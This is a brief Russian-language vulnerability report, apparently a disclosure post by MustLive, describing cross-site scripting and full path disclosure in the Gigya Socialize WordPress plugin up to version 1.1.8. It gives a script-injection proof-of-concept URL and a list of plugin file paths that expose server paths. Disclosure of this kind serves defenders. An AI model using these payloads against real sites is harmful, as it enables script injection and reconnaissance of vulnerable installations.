Здравствуйте 3APA3A!
Сообщаю вам о найденных мною Cross-Site Scripting и Full path disclosure
уязвимостях в плагине Gigya Socialize для WordPress.
XSS:
http://site/?%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E
XSS имеет место в логин виджете данного плагина.
Full path disclosure:
http://site/wp-content/plugins/gigya-socialize-for-wordpress/gs-for-wordpress.php
http://site/wp-content/plugins/gigya-socialize-for-wordpress/views/login.php
http://site/wp-content/plugins/gigya-socialize-for-wordpress/views/admin/help.php
http://site/wp-content/plugins/gigya-socialize-for-wordpress/views/admin/invite-friends.php
http://site/wp-content/plugins/gigya-socialize-for-wordpress/views/admin/settings.php
http://site/wp-content/plugins/gigya-socialize-for-wordpress/views/widget/widget-connected.php
http://site/wp-content/plugins/gigya-socialize-for-wordpress/views/widget/widget-control.php
http://site/wp-content/plugins/gigya-socialize-for-wordpress/views/widget/widget-not-connected.php
http://site/wp-content/plugins/gigya-socialize-for-wordpress/views/widget/widget-not-logged-in.php
Уязвимы Gigya Socialize 1.1.8 и предыдущие версии.
Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/4153/
Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua